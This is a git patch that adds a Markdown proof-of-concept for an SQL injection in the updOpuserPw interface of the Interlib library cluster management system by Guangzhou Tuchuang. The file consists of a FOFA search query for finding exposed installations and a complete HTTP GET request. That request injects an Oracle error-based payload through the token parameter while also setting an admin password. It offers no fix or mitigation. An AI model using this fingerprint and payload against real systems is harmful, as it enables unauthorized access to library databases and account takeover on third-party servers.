From feb31b7ab376aa02db5e7fb65d57c7b5fdd27d7e Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 16 Apr 2024 16:59:33 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=B9=BF=E5=B7=9E=E5=9B=BE=E5=88=9B?= =?UTF-8?q?=E5=9B=BE=E4=B9=A6=E9=A6=86=E9=9B=86=E7=BE=A4=E7=AE=A1=E7=90=86?= =?UTF-8?q?=E7=B3=BB=E7=BB=9FupdOpuserPw=E6=8E=A5=E5=8F=A3=E5=AD=98?= =?UTF-8?q?=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md diff --git a/广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md b/广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md new file mode 100644 index 0000000..6170b8a --- /dev/null +++ b/广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md @@ -0,0 +1,20 @@ +## 广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞 + + + +## fofa +``` +body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面" +``` + + +## poc +``` +GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*1111111%20from%20dual))=%272 HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 +Accept-Charset: utf-8 +Accept-Encoding: gzip, deflate +Connection: close + +```